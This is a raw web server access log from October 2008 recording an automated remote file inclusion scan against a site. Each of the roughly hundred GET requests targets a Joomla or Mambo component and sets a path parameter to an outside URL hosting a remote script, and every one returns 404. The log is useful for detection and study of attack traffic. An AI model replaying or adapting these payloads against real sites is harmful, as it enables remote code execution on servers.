213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080603.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080603.log%20%20//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080530.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:41 -0700] "GET /logs/access_080606.log%20%20//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080606.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log%20%20//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080603.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080606.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080606.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080606.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080606.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080603.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log//administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080606.log//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080606.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080606.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080530.log%20%20//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:42 -0700] "GET /logs/access_080606.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:42 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080603.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080603.log%20%20//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log%20%20//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:13:43 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log%20%20//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080530.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs/access_080606.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:43 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
